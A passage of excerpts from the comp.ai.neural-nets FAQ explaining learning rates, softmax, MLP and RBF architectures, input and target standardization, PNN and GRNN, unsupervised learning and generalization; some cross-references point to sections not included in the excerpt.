slowly. Too high a learning rate makes the weights and error function
diverge, so there is no learning at all. If the error function is
quadratic, as in linear models, good learning rates can be computed from
the Hessian matrix (Bertsekas and Tsitsiklis, 1996). If the error function
has many local and global optima, as in typical feedforward NNs with
hidden units, the optimal learning rate often changes dramatically during
the training process, since the Hessian also changes dramatically. Trying
to train a NN using a constant learning rate is usually a tedious process
requiring much trial and error.

With batch training, there is no need to use a constant learning rate. In
fact, there is no reason to use standard backprop at all, since vastly
more efficient, reliable, and convenient batch training algorithms exist
(see Quickprop and RPROP under "What is backprop?" and the numerous
training algorithms mentioned under "What are conjugate gradients,
Levenberg-Marquardt, etc.?").

With incremental training, it is much more difficult to concoct an
algorithm that automatically adjusts the learning rate during training.
Various proposals have appeared in the NN literature, but most of them
don't work. Problems with some of these proposals are illustrated by
Darken and Moody (1992), who unfortunately do not offer a solution. Some
promising results are provided by by LeCun, Simard, and Pearlmutter
(1993), and by Orr and Leen (1997), who adapt the momentum rather than the
learning rate. There is also a variant of stochastic approximation called
"iterate averaging" or "Polyak averaging" (Kushner and Yin 1997), which
theoretically provides optimal convergence rates by keeping a running
average of the weight values. I have no personal experience with these
methods; if you have any solid evidence that these or other methods of
automatically setting the learning rate and/or momentum in incremental
training actually work in a wide variety of NN applications, please inform
the FAQ maintainer (sas...@unx.sas.com).

Training a neural network is, in most cases, an exercise in numerical
optimization of a usually nonlinear objective function ("objective
function" means whatever function you are trying to optimize and is a
slightly more general term than "error function" in that it may include
other quantities such as penalties for weight decay). Methods of nonlinear
optimization have been studied for hundreds of years, and there is a huge
literature on the subject in fields such as numerical analysis, operations
research, and statistical computing, e.g., Bertsekas (1995), Bertsekas and
Tsitsiklis (1996), Gill, Murray, and Wright (1981). Masters (1995) has a
good elementary discussion of conjugate gradient and Levenberg-Marquardt
algorithms in the context of NNs.

There is no single best method for nonlinear optimization. You need to
choose a method based on the characteristics of the problem to be solved.

First, consider unordered categories. If you want to classify cases into one
of C categories (i.e. you have a categorical target variable), use 1-of-C
coding. That means that you code C binary (0/1) target variables
corresponding to the C categories. Statisticians call these "dummy"
variables. Each dummy variable is given the value zero except for the one
corresponding to the correct category, which is given the value one. Then
use a softmax output activation function (see "What is a softmax activation
function?") so that the net, if properly trained, will produce valid
posterior probability estimates.

Although this representation involves only a single quantitative input,
given enough hidden units, the net is capable of computing nonlinear
transformations of that input that will produce results equivalent to any of
the dummy coding schemes. But using a single quantitative input makes it
easier for the net to use the order of the categories to generalize when
that is appropriate.

Sigmoid hidden and output units usually use a "bias" or "threshold" term in
computing the net input to the unit. A bias term can be treated as a
connection weight from an input with a constant value of one. Hence the bias
can be learned just like any other weight. For a linear output unit, a bias
term is equivalent to an intercept in a linear regression model.

Consider a multilayer perceptron with any of the usual sigmoid activation
functions. Choose any hidden unit or output unit. Let's say there are N
inputs to that unit, which define an N-dimensional space. The given unit
draws a hyperplane through that space, producing an "on" output on one side
and an "off" output on the other. (With sigmoid units the plane will not be
sharp -- there will be some gray area of intermediate values near the
separating plane -- but ignore this for now.)

The weights determine where this hyperplane lies in the input space. Without
a bias input, this separating hyperplane is constrained to pass through the
origin of the space defined by the inputs. For some problems that's OK, but
in many problems the hyperplane would be much more useful somewhere else. If
you have many units in a layer, they share the same input space and without
bias would ALL be constrained to pass through the origin.

The "universal approximation" property of multilayer perceptrons with most
commonly-used hidden-layer activation functions does not hold if you omit
the bias units. But Hornik (1993) shows that a sufficient condition for the
universal approximation property without biases is that no derivative of the
activation function vanishes at the origin, which implies that with the
usual sigmoid activation functions, a fixed nonzero bias can be used.

Activation functions for the hidden units are needed to introduce
nonlinearity into the network. Without nonlinearity, hidden units would not
make nets more powerful than just plain perceptrons (which do not have any
hidden units, just input and output units). The reason is that a composition
of linear functions is again a linear function. However, it is the
nonlinearity (i.e, the capability to represent nonlinear functions) that
makes multilayer networks so powerful. Almost any nonlinear function does
the job, although for backpropagation learning it must be differentiable and
it helps if the function is bounded; the sigmoidal functions such as
logistic and tanh and the Gaussian function are the most common choices.

For the output units, you should choose an activation function suited to the
distribution of the target values. Bounded activation functions such as the
logistic are particularly useful when the target values have a bounded
range. But if the target values have no known bounded range, it is better to
use an unbounded activation function, most often the identity function
(which amounts to no activation function). If the target values are positive
but have no known upper bound, you can use an exponential output activation
function (but beware of overflow if you are writing your own code).

There are certain natural associations between output activation functions
and various noise distributions which have been studied by statisticians in
the context of generalized linear models. The output activation function is
the inverse of what statisticians call the "link function". See:

The purpose of the softmax activation function is to make the sum of the
outputs equal to one, so that the outputs are interpretable as posterior
probabilities. Let the net input to each output unit be q_i, i=1,...,c where
c is the number of categories. Then the softmax output p_i is:

exp(q_i)
p_i = ------------
c
sum exp(q_j)
j=1

Unless you are using weight decay or Bayesian estimation or some such thing
that requires the weights to be treated on an equal basis, you can choose
any one of the output units and leave it completely unconnected--just set
the net input to 0. Connecting all of the output units will just give you
redundant weights and will slow down training. To see this, add an arbitrary
constant z to each net input and you get:

exp(q_i+z) exp(q_i) exp(z) exp(q_i)
p_i = ------------ = ------------------- = ------------
c c c
sum exp(q_j+z) sum exp(q_j) exp(z) sum exp(q_j)
j=1 j=1 j=1

so nothing changes. Hence you can always pick one of the output units, and
add an appropriate constant to each net input to produce any desired net
input for the selected output unit, which you can choose to be zero or
whatever is convenient. You can use the same trick to make sure that none of
the exponentials overflows.

Statisticians usually call softmax a "multiple logistic" function. It
reduces to the simple logistic function when there are only two categories.
Suppose you choose to set q_2 to 0. Then

exp(q_1) exp(q_1) 1
p_1 = ------------ = ----------------- = -------------
c exp(q_1) + exp(0) 1 + exp(-q_1)
sum exp(q_j)
j=1

and p_2, of course, is 1-p_1.

The softmax function derives naturally from log-linear models and leads to
convenient interpretations of the weights in terms of odds ratios. You
could, however, use a variety of other nonnegative functions on the real
line in place of the exp function. Or you could constrain the net inputs to
the output units to be nonnegative, and just divide by the sum--that's
called the Bradley-Terry-Luce model.

A priori information can help with the curse of dimensionality. Careful
feature selection and scaling of the inputs fundamentally affects the
severity of the problem, as well as the selection of the neural network
model. For classification purposes, only the borders of the classes are
important to represent accurately.

The inputs to each hidden or output unit must be combined with the weights
to yield a single value called the "net input" to which the activation
function is applied. There does not seem to be a standard term for the
function that combines the inputs and weights; I will use the term
"combination function". Thus, each hidden or output unit in a feedforward
network first computes a combination function to produce the net input, and
then applies an activation function to the net input yielding the activation
of the unit.

A multilayer perceptron (MLP) has one or more hidden layers for which the
combination function is the inner product of the inputs and weights, plus a
bias.

The MLP architecture is the most popular one in practical applications. Each
layer uses a linear combination function. The inputs are fully connected to
the first hidden layer, each hidden layer is fully connected to the next,
and the last hidden layer is fully connected to the outputs. You can also
have "skip-layer" connections; direct connections from inputs to outputs are
especially useful.

Consider the multidimensional space of inputs to a given hidden unit. Since
an MLP uses linear combination functions, the set of all points in the space
having a given value of the activation function is a hyperplane. The
hyperplanes corresponding to different activation levels are parallel to
each other (the hyperplanes for different units are not parallel in
general). These parallel hyperplanes are the isoactivation contours of the
hidden unit.

Radial basis function (RBF) networks usually have only one hidden layer for
which the combination function is based on the Euclidean distance between
the input vector and the weight vector. RBF networks do not have anything
that's exactly the same as the bias term in an MLP. But some types of RBFs
have a "width" associated with each hidden unit or with the the entire
hidden layer; instead of adding it in the combination function like a bias,
you divide the Euclidean distance by the width.

The ORBF architectures use radial combination functions and the exp
activation function. Only two of the radial combination functions are useful
with ORBF architectures. For radial combination functions including an
altitude, the altitude would be redundant with the hidden-to-output weights.

Radial combination functions are based on the Euclidean distance between the
vector of inputs to the unit and the vector of corresponding weights. Thus,
the isoactivation contours for ORBF networks are concentric hyperspheres. A
variety of activation functions can be used with the radial combination
function, but the exp activation function, yielding a Gaussian surface, is
the most useful. Radial networks typically have only one hidden layer, but
it can be useful to include a linear layer for dimensionality reduction or
oblique rotation before the RBF layer.

The output of an ORBF network consists of a number of superimposed bumps,
hence the output is quite bumpy unless many hidden units are used. Thus an
ORBF network with only a few hidden units is incapable of fitting a wide
variety of simple, smooth functions, and should rarely be used.

The NRBF architectures also use radial combination functions but the
activation function is softmax, which forces the sum of the activations for
the hidden layer to equal one. Thus, each output unit computes a weighted
average of the hidden-to-output weights, and the output values must lie
within the range of the hidden-to-output weights. Therefore, if the
hidden-to-output weights are within a reasonable range (such as the range of
the target values), you can be sure that the outputs will be within that
same range for all possible inputs, even when the net is extrapolating. No
comparably useful bound exists for the output of an ORBF network.

If you extrapolate far enough in a Gaussian ORBF network with an identity
output activation function, the activation of every hidden unit will
approach zero, hence the extrapolated output of the network will equal the
output bias. If you extrapolate far enough in an NRBF network, one hidden
unit will come to dominate the output. Hence if you want the network to
extrapolate different values in a different directions, an NRBF should be
used instead of an ORBF.

Radial combination functions incorporating altitudes are useful with NRBF
architectures. The NRBF architectures combine some of the virtues of both
the RBF and MLP architectures, as explained below. However, the
isoactivation contours are considerably more complicated than for ORBF
architectures.

Consider the case of an NRBF network with only two hidden units. If the
hidden units have equal widths, the isoactivation contours are parallel
hyperplanes; in fact, this network is equivalent to an MLP with one logistic
hidden unit. If the hidden units have unequal widths, the isoactivation
contours are concentric hyperspheres; such a network is almost equivalent to
an ORBF network with one Gaussian hidden unit.

If there are more than two hidden units in an NRBF network, the
isoactivation contours have no such simple characterization. If the RBF
widths are very small, the isoactivation contours are approximately
piecewise linear for RBF units with equal widths, and approximately
piecewise spherical for RBF units with unequal widths. The larger the
widths, the smoother the isoactivation contours where the pieces join. As
Shorten and Murray-Smith (1996) point out, the activation is not necessarily
a monotone function of distance from the center when unequal widths are
used.

In a NRBFEQ architecture, if each observation is taken as an RBF center, and
if the weights are taken to be the target values, the outputs are simply
weighted averages of the target values, and the network is identical to the
well-known Nadaraya-Watson kernel regression estimator, which has been
reinvented at least twice in the neural net literature (see "What is
GRNN?"). A similar NRBFEQ network used for classification is equivalent to
kernel discriminant analysis (see "What is PNN?").

Kernels with variable widths are also used for regression in the statistical
literature. Such kernel estimators correspond to the the NRBFEV
architecture, in which the kernel functions have equal volumes but different
altitudes. In the neural net literature, variable-width kernels appear
always to be of the NRBFEH variety, with equal altitudes but unequal
volumes. The analogy with kernel regression would make the NRBFEV
architecture the obvious choice, but which of the two architectures works
better in practice is an open question.

Hybrid training is not often applied to MLPs because no effective methods
are known for unsupervised training of the hidden units (except when there
is only one input).

Hybrid training will usually require more hidden units than supervised
training. Since supervised training optimizes the locations of the centers,
while hybrid training does not, supervised training will provide a better
approximation to the function to be learned for a given number of hidden
units. Thus, the better fit provided by supervised training will often let
you use fewer hidden units for a given accuracy of approximation than you
would need with hybrid training. And if the hidden-to-output weights are
learned by linear least-squares, the fact that hybrid training requires more
hidden units implies that hybrid training will also require more training
cases for the same accuracy of generalization (Tarassenko and Roberts 1994).

The number of hidden units required by hybrid methods becomes an
increasingly serious problem as the number of inputs increases. In fact, the
required number of hidden units tends to increase exponentially with the
number of inputs. This drawback of hybrid methods is discussed by Minsky and
Papert (1969). For example, with method (1) for RBF networks, you would need
at least five elements in the grid along each dimension to detect a moderate
degree of nonlinearity; so if you have Nx inputs, you would need at least
5^Nx hidden units. For methods (2) and (3), the number of hidden units
increases exponentially with the effective dimensionality of the input
distribution. If the inputs are linearly related, the effective
dimensionality is the number of nonnegligible (a deliberately vague term)
eigenvalues of the covariance matrix, so the inputs must be highly
correlated if the effective dimensionality is to be much less than the
number of inputs.

The exponential increase in the number of hidden units required for hybrid
learning is one aspect of the curse of dimensionality. The number of
training cases required also increases exponentially in general. No neural
network architecture--in fact no method of learning or statistical
estimation--can escape the curse of dimensionality in general, hence there
is no practical method of learning general functions in more than a few
dimensions.

An additive model is one in which the output is a sum of linear or nonlinear
transformations of the inputs. If an additive model is appropriate, the
number of weights increases linearly with the number of inputs, so high
dimensionality is not a curse. Various methods of training additive models
are available in the statistical literature (e.g. Hastie and Tibshirani
1990). You can also create a feedforward neural network, called a
"generalized additive network" (GAN), to fit additive models (Sarle 1994a).
Additive models have been proposed in the neural net literature under the
name "topologically distributed encoding" (Geiger 1990).

Projection pursuit regression (PPR) provides both universal approximation
and the ability to avoid the curse of dimensionality for certain common
types of target functions (Friedman and Stuetzle 1981). Like MLPs, PPR
computes the output as a sum of nonlinear transformations of linear
combinations of the inputs. Each term in the sum is analogous to a hidden
unit in an MLP. But unlike MLPs, PPR allows general, smooth nonlinear
transformations rather than a specific nonlinear activation function, and
allows a different transformation for each term. The nonlinear
transformations in PPR are usually estimated by nonparametric regression,
but you can set up a projection pursuit network (PPN), in which each
nonlinear transformation is performed by a subnetwork. If a PPN provides an
adequate fit with few terms, then the curse of dimensionality can be
avoided, and the results may even be interpretable.

If the target function can be accurately approximated by projection pursuit,
then it can also be accurately approximated by an MLP with a single hidden
layer. The disadvantage of the MLP is that there is little hope of
interpretability. An MLP with two or more hidden layers can provide a
parsimonious fit to a wider variety of target functions than can projection
pursuit, but no simple characterization of these functions is known.

With proper training, all of the RBF architectures listed above, as well as
MLPs, can process redundant inputs effectively. When there are redundant
inputs, the training cases lie close to some (possibly nonlinear) subspace.
If the same degree of redundancy applies to the test cases, the network need
produce accurate outputs only near the subspace occupied by the data. Adding
redundant inputs has little effect on the effective dimensionality of the
data; hence the curse of dimensionality does not apply, and even hybrid
methods (2) and (3) can be used. However, if the test cases do not follow
the same pattern of redundancy as the training cases, generalization will
require extrapolation and will rarely work well.

MLP architectures are good at ignoring irrelevant inputs. MLPs can also
select linear subspaces of reduced dimensionality. Since the first hidden
layer forms linear combinations of the inputs, it confines the networks
attention to the linear subspace spanned by the weight vectors. Hence,
adding irrelevant inputs to the training data does not increase the number
of hidden units required, although it increases the amount of training data
required.

ORBF architectures are not good at ignoring irrelevant inputs. The number of
hidden units required grows exponentially with the number of inputs,
regardless of how many inputs are relevant. This exponential growth is
related to the fact that ORBFs have local receptive fields, meaning that
changing the hidden-to-output weights of a given unit will affect the output
of the network only in a neighborhood of the center of the hidden unit,
where the size of the neighborhood is determined by the width of the hidden
unit. (Of course, if the width of the unit is learned, the receptive field
could grow to cover the entire training set.)

Local receptive fields are often an advantage compared to the distributed
architecture of MLPs, since local units can adapt to local patterns in the
data without having unwanted side effects in other regions. In a distributed
architecture such as an MLP, adapting the network to fit a local pattern in
the data can cause spurious side effects in other parts of the input space.

However, ORBF architectures often must be used with relatively small
neighborhoods, so that several hidden units are required to cover the range
of an input. When there are many nonredundant inputs, the hidden units must
cover the entire input space, and the number of units required is
essentially the same as in the hybrid case (1) where the centers are in a
regular grid; hence the exponential growth in the number of hidden units
with the number of inputs, regardless of whether the inputs are relevant.

You can enable an ORBF architecture to ignore irrelevant inputs by using an
extra, linear hidden layer before the radial hidden layer. This type of
network is sometimes called an "elliptical basis function" network. If the
number of units in the linear hidden layer equals the number of inputs, the
linear hidden layer performs an oblique rotation of the input space that can
suppress irrelevant directions and differentally weight relevant directions
according to their importance. If you think that the presence of irrelevant
inputs is highly likely, you can force a reduction of dimensionality by
using fewer units in the linear hidden layer than the number of inputs.

Note that the linear and radial hidden layers must be connected in series,
not in parallel, to ignore irrelevant inputs. In some applications it is
useful to have linear and radial hidden layers connected in parallel, but in
such cases the radial hidden layer will be sensitive to all inputs.

For even greater flexibility (at the cost of more weights to be learned),
you can have a separate linear hidden layer for each RBF unit, allowing a
different oblique rotation for each RBF unit.

NRBF architectures with equal widths (NRBFEW and NRBFEQ) combine the
advantage of local receptive fields with the ability to ignore irrelevant
inputs. The receptive field of one hidden unit extends from the center in
all directions until it encounters the receptive field of another hidden
unit. It is convenient to think of a "boundary" between the two receptive
fields, defined as the hyperplane where the two units have equal
activations, even though the effect of each unit will extend somewhat beyond
the boundary. The location of the boundary depends on the heights of the
hidden units. If the two units have equal heights, the boundary lies midway
between the two centers. If the units have unequal heights, the boundary is
farther from the higher unit.

If a hidden unit is surrounded by other hidden units, its receptive field is
indeed local, curtailed by the field boundaries with other units. But if a
hidden unit is not completely surrounded, its receptive field can extend
infinitely in certain directions. If there are irrelevant inputs, or more
generally, irrelevant directions that are linear combinations of the inputs,
the centers need only be distributed in a subspace orthogonal to the
irrelevant directions. In this case, the hidden units can have local
receptive fields in relevant directions but infinite receptive fields in
irrelevant directions.

For NRBF architectures allowing unequal widths (NRBFUN, NRBFEV, and NRBFEH),
the boundaries between receptive fields are generally hyperspheres rather
than hyperplanes. In order to ignore irrelevant inputs, such networks must
be trained to have equal widths. Hence, if you think there is a strong
possibility that some of the inputs are irrelevant, it is usually better to
use an architecture with equal widths.

OLS is a variety of supervised training. But whereas backprop and other
commonly-used supervised methods are forms of continuous optimization, OLS
is a form of combinatorial optimization. Rather than treating the RBF
centers as continuous values to be adjusted to reduce the training error,
OLS starts with a large set of candidate centers and selects a subset that
usually provides good training error. For small training sets, the
candidates can include all of the training cases. For large training sets,
it is more efficient to use a random subset of the training cases or to do a
cluster analysis and use the cluster means as candidates.

"Normalizing" a vector most often means dividing by a norm of the vector,
for example, to make the Euclidean length of the vector equal to one. In the
NN literature, "normalizing" also often refers to rescaling by the minimum
and range of the vector, to make all the elements lie between 0 and 1.

"Standardizing" a vector most often means subtracting a measure of location
and dividing by a measure of scale. For example, if the vector contains
random values with a Gaussian distribution, you might subtract the mean and
divide by the standard deviation, thereby obtaining a "standard normal"
random variable with mean 0 and standard deviation 1.

There is a common misconception that the inputs to a multilayer perceptron
must be in the interval [0,1]. There is in fact no such requirement,
although there often are benefits to standardizing the inputs as discussed
below. But it is better to have the input values centered around zero, so
scaling the inputs to the interval [0,1] is usually a bad choice.

If your output activation function has a range of [0,1], then obviously you
must ensure that the target values lie within that range. But it is
generally better to choose an output activation function suited to the
distribution of the targets than to force your data to conform to the output
activation function. See "Why use activation functions?"

When using an output activation with a range of [0,1], some people prefer to
rescale the targets to a range of [.1,.9]. I suspect that the popularity of
this gimmick is due to the slowness of standard backprop. But using a target
range of [.1,.9] for a classification task gives you incorrect posterior
probability estimates, and it is quite unnecessary if you use an efficient
training algorithm (see "What are conjugate gradients, Levenberg-Marquardt,
etc.?")

Now for some of the gory details: note that the training data form a matrix.
Let's set up this matrix so that each case forms a row, and the inputs and
target variables form columns. You could conceivably standardize the rows or
the columns or both or various other things, and these different ways of
choosing vectors to standardize will have quite different effects on
training.

Standardizing either input or target variables tends to make the training
process better behaved by improving the numerical condition of the
optimization problem and ensuring that various default values involved in
initialization and termination are appropriate. Standardizing targets can
also affect the objective function.

If the input variables are combined linearly, as in an MLP, then it is
rarely strictly necessary to standardize the inputs, at least in theory. The
reason is that any rescaling of an input vector can be effectively undone by
changing the corresponding weights and biases, leaving you with the exact
same outputs as you had before. However, there are a variety of practical
reasons why standardizing the inputs can make training faster and reduce the
chances of getting stuck in local optima. Also, weight decay and Bayesian
estimation can be done more conveniently with standardized inputs.

The main emphasis in the NN literature on initial values has been on the
avoidance of saturation, hence the desire to use small random values. How
small these random values should be depends on the scale of the inputs as
well as the number of inputs and their correlations. Standardizing inputs
removes the problem of scale dependence of the initial weights.

But standardizing input variables can have far more important effects on
initialization of the weights than simply avoiding saturation. Assume we
have an MLP with one hidden layer applied to a classification problem and
are therefore interested in the hyperplanes defined by each hidden unit.
Each hyperplane is the locus of points where the net-input to the hidden
unit is zero and is thus the classification boundary generated by that
hidden unit considered in isolation. The connection weights from the inputs
to a hidden unit determine the orientation of the hyperplane. The bias
determines the distance of the hyperplane from the origin. If the bias terms
are all small random numbers, then all the hyperplanes will pass close to
the origin. Hence, if the data are not centered at the origin, the
hyperplane may fail to pass through the data cloud. If all the inputs have a
small coefficient of variation, it is quite possible that all the initial
hyperplanes will miss the data entirely. With such a poor initialization,
local minima are very likely to occur. It is therefore important to center
the inputs to get good random initializations. In particular, scaling the
inputs to [-1,1] will work better than [0,1], although any scaling that sets
to zero the mean or median or other measure of central tendency is likely to
be as good or better.

Standardizing target variables is typically more a convenience for getting
good initial weights than a necessity. However, if you have two or more
target variables and your error function is scale-sensitive like the usual
least (mean) squares error function, then the variability of each target
relative to the others can effect how well the net learns that target. If
one target has a range of 0 to 1, while another target has a range of 0 to
1,000,000, the net will expend most of its effort learning the second target
to the possible exclusion of the first. So it is essential to rescale the
targets so that their variability reflects their importance, or at least is
not in inverse relation to their importance. If the targets are of equal
importance, they should typically be standardized to the same range or the
same standard deviation.

The scaling of the targets does not affect their importance in training if
you use maximum likelihood estimation and estimate a separate scale
parameter (such as a standard deviation) for each target variable. In this
case, the importance of each target is inversely related to its estimated
scale parameter. In other words, noisier targets will be given less
importance.

For weight decay and Bayesian estimation, the scaling of the targets affects
the decay values and prior distributions. Hence it is usually most
convenient to work with standardized targets.

Standardization of cases should be approached with caution because it
discards information. If that information is irrelevant, then standardizing
cases can be quite helpful. If that information is important, then
standardizing cases can be disastrous. Issues regarding the standardization
of cases must be carefully evaluated in every application. There are no
rules of thumb that apply to all applications.

You may want to standardize each case if there is extraneous variability
between cases. Consider the common situation in which each input variable
represents a pixel in an image. If the images vary in exposure, and exposure
is irrelevant to the target values, then it would usually help to subtract
the mean of each case to equate the exposures of different cases. If the
images vary in contrast, and contrast is irrelevant to the target values,
then it would usually help to divide each case by its standard deviation to
equate the contrasts of different cases. Given sufficient data, a NN could
learn to ignore exposure and contrast. However, training will be easier and
generalization better if you can remove the extraneous exposure and contrast
information before training the network.

As another example, suppose you want to classify plant specimens according
to species but the specimens are at different stages of growth. You have
measurements such as stem length, leaf length, and leaf width. However, the
over-all size of the specimen is determined by age or growing conditions,
not by species. Given sufficient data, a NN could learn to ignore the size
of the specimens and classify them by shape instead. However, training will
be easier and generalization better if you can remove the extraneous size
information before training the network. Size in the plant example
corresponds to exposure in the image example.

If the data are measured on a ratio scale, you can control for size by
dividing each datum by a measure of over-all size. It is common to divide by
the sum or by the arithmetic mean. For positive ratio data, however, the
geometric mean is often a more natural measure of size than the arithmetic
mean. It may also be more meaningful to analyze the logarithms of positive
ratio-scaled data, in which case you can subtract the arithmetic mean after
taking logarithms. You must also consider the dimensions of measurement. For
example, if you have measures of both length and weight, you may need to
cube the measures of length or take the cube root of the weights.

Most importantly, nonlinear transformations of the targets are important
with noisy data, via their effect on the error function. Many commonly used
error functions are functions solely of the difference abs(target-output).
Nonlinear transformations (unlike linear transformations) change the
relative sizes of these differences. With most error functions, the net will
expend more effort, so to speak, trying to learn target values for which
abs(target-output) is large.

For example, suppose you are trying to predict the price of a stock. If the
price of the stock is 10 (in whatever currency unit) and the output of the
net is 5 or 15, yielding a difference of 5, that is a huge error. If the
price of the stock is 1000 and the output of the net is 995 or 1005,
yielding the same difference of 5, that is a tiny error. You don't want the
net to treat those two differences as equally important. By taking
logarithms, you are effectively measuring errors in terms of ratios rather
than differences, since a difference between two logs corresponds to the
ratio of the original values. This has approximately the same effect as
looking at percentage differences, abs(target-output)/target or
abs(target-output)/output, rather than simple differences.

It is usually advisable to choose an error function appropriate for the
distribution of noise in your target variables (McCullagh and Nelder 1989).
But if your software does not provide a sufficient variety of error
functions, then you may need to transform the target so that the noise
distribution conforms to whatever error function you are using. For example,
if you have to use least-(mean-)squares training, you will get the best
results if the noise distribution is approximately Gaussian with constant
variance, since least-(mean-)squares is maximum likelihood in that case.
Heavy-tailed distributions (those in which extreme values occur more often
than in a Gaussian distribution, often as indicated by high kurtosis) are
especially of concern, due to the loss of statistical efficiency of
least-(mean-)square estimates (Huber 1981). Note that what is important is
the distribution of the noise, not the distribution of the target values.

ART stands for "Adaptive Resonance Theory", invented by Stephen Grossberg in
1976. ART encompasses a wide variety of neural networks based explicitly on
neurophysiology. ART networks are defined algorithmically in terms of
detailed differential equations intended as plausible models of biological
neurons. In practice, ART networks are implemented using analytical
solutions or approximations to these differential equations.

PNN or "Probabilistic Neural Network" is Donald Specht's term for kernel
discriminant analysis. You can think of it as a normalized RBF network in
which there is a hidden unit centered at every training case. These RBF
units are called "kernels" and are usually probability density functions
such as the Gaussian. The hidden-to-output weights are usually 1 or 0; for
each hidden unit, a weight of 1 is used for the connection going to the
output that the case belongs to, while all other connections are given
weights of 0. Alternatively, you can adjust these weights for the prior
probabilities of each class. So the only weights that need to be learned are
the widths of the RBF units. These widths (often a single width is used) are
called "smoothing parameters" or "bandwidths" and are usually chosen by
cross-validation or by more esoteric methods that are not well-known in the
neural net literature; gradient descent is not used.

Specht's claim that a PNN trains 100,000 times faster than backprop is at
best misleading. While they are not iterative in the same sense as backprop,
kernel methods require that you estimate the kernel bandwidth, and this
requires accessing the data many times. Furthermore, computing a single
output value with kernel methods requires either accessing the entire
training data or clever programming, and either way is much slower than
computing an output with a feedforward net. And there are a variety of
methods for training feedforward nets that are much faster than standard
backprop. So depending on what you are doing and how you do it, PNN may be
either faster or slower than a feedforward net.

PNN is a universal approximator for smooth class-conditional densities, so
it should be able to solve any smooth classification problem given enough
data. The main drawback of PNN is that, like kernel methods in general, it
suffers badly from the curse of dimensionality. PNN cannot ignore irrelevant
inputs without major modifications to the basic algorithm. So PNN is not
likely to be the top choice if you have more than 5 or 6 nonredundant
inputs.

But if all your inputs are relevant, PNN has the very useful ability to tell
you whether a test case is similar (i.e. has a high density) to any of the
training data; if not, you are extrapolating and should view the output
classification with skepticism. This ability is of limited use when you have
irrelevant inputs, since the similarity is measured with respect to all of
the inputs, not just the relevant ones.

GRNN or "General Regression Neural Network" is Donald Specht's term for
Nadaraya-Watson kernel regression, also reinvented in the NN literature by
Schi\oler and Hartmann. You can think of it as a normalized RBF network in
which there is a hidden unit centered at every training case. These RBF
units are called "kernels" and are usually probability density functions
such as the Gaussian. The hidden-to-output weights are just the target
values, so the output is simply a weighted average of the target values of
training cases close to the given input case. The only weights that need to
be learned are the widths of the RBF units. These widths (often a single
width is used) are called "smoothing parameters" or "bandwidths" and are
usually chosen by cross-validation or by more esoteric methods that are not
well-known in the neural net literature; gradient descent is not used.

GRN is a universal approximator for smooth functions, so it should be able
to solve any smooth function-approximation problem given enough data. The
main drawback of GRNN is that, like kernel methods in general, it suffers
badly from the curse of dimensionality. GRNN cannot ignore irrelevant inputs
without major modifications to the basic algorithm. So GRNN is not likely to
be the top choice if you have more than 5 or 6 nonredundant inputs.

Unsupervised learning allegedly involves no target values. In fact, for most
varieties of unsupervised learning, the targets are the same as the inputs
(Sarle 1994). In other words, unsupervised learning usually performs the
same task as an auto-associative network, compressing the information from
the inputs (Deco and Obradovic 1996). Unsupervised learning is very useful
for data visualization (Ripley 1996), although the NN literature generally
ignores this application.

Unsupervised competitive learning is used in a wide variety of fields under
a wide variety of names, the most common of which is "cluster analysis" (see
the Classification Society of North America's web site for more information
on cluster analysis, including software, at http://www.pitt.edu/~csna/.) The
main form of competitive learning in the NN literature is vector
quantization (VQ, also called a "Kohonen network", although Kohonen invented
several other types of networks as well--see "How many kinds of Kohonen
networks exist?" which provides more reference on VQ). Kosko (1992) and
Hecht-Nielsen (1990) review neural approaches to VQ, while the textbook by
Gersho and Gray (1992) covers the area from the perspective of signal
processing. In statistics, VQ has been called "principal point analysis"
(Flury, 1990, 1993; Tarpey et al., 1994) but is more frequently encountered
in the guise of k-means clustering. In VQ, each of the competitive units
corresponds to a cluster center (also called a codebook vector), and the
error function is the sum of squared Euclidean distances between each
training case and the nearest center. Often, each training case is
normalized to a Euclidean length of one, which allows distances to be
simplified to inner products. The more general error function based on
distances is the same error function used in k-means clustering, one of the
most common types of cluster analysis (MacQueen 1967; Anderberg 1973). The
k-means model is an approximation to the normal mixture model (McLachlan and
Basford 1988) assuming that the mixture components (clusters) all have
spherical covariance matrices and equal sampling probabilities. Normal
mixtures have found a variety of uses in neural networks (e.g., Bishop
1995). Balakrishnan, Cooper, Jacob, and Lewis (1994) found that k-means
algorithms used as normal-mixture approximations recover cluster membership
more accurately than Kohonen algorithms.

Hebbian learning is the other most most common variety of unsupervised
learning (Hertz, Krogh, and Palmer 1991). Hebbian learning minimizes the
same error function as an auto-associative network with a linear hidden
layer, trained by least squares, and is therefore a form of dimensionality
reduction. This error function is equivalent to the sum of squared distances
between each training case and a linear subspace of the input space (with
distances measured perpendicularly), and is minimized by the leading
principal components (Pearson 1901; Hotelling 1933; Rao 1964; Joliffe 1986;
Jackson 1991; Diamantaras and Kung 1996). There are variations of Hebbian
learning that explicitly produce the principal components (Hertz, Krogh, and
Palmer 1991; Karhunen 1994; Deco and Obradovic 1996; Diamantaras and Kung
1996).

During learning, the outputs of a supervised neural net come to approximate
the target values given the inputs in the training set. This ability may be
useful in itself, but more often the purpose of using a neural net is to
generalize--i.e., to have the outputs of the net approximate target values
given inputs that are not in the training set. Generalizaton is not always
possible, despite the blithe assertions of some authors. For example,
Caudill and Butler, 1990, p. 8, claim that "A neural network is able to
generalize", but they provide no justification for this claim, and they
completely neglect the complex issues involved in getting good
generalization.

There are three conditions that are typically necessary (although not
sufficient) for good generalization.

The first necessary condition is that the inputs to the network contain
sufficient information pertaining to the target, so that there exists a
mathematical function relating correct outputs to inputs with the desired
degree of accuracy. You can't expect a network to learn a nonexistent
function--neural nets are not clairvoyant! For example, if you want to
forecast the price of a stock, a historical record of the stock's prices is
rarely sufficient input; you need detailed information on the financial
state of the company as well as general economic conditions, and to avoid
nasty surprises, you should also include inputs that can accurately predict
wars in the Middle East and earthquakes in Japan. Finding good inputs for a
net and collecting enough training data often take far more time and effort
than training the network.

The second necessary condition is that the function you are trying to learn
(that relates inputs to correct outputs) be, in some sense, smooth. In other
words, a small change in the inputs should, most of the time, produce a
small change in the outputs. For continuous inputs and targets, smoothness
of the function implies continuity and restrictions on the first derivative
over most of the input space. Some neural nets can learn discontinuities as
long as the function consists of a finite number of continuous pieces. Very
nonsmooth functions such as those produced by pseudo-random number
generators and encryption algorithms cannot be generalized by neural nets.
Often a nonlinear transformation of the input space can increase the
smoothness of the function and improve generalization.

For classification, if you do not need to estimate posterior probabilities,
then smoothness is not theoretically necessary. In particular, feedforward
networks with one hidden layer trained by minimizing the error rate (a very
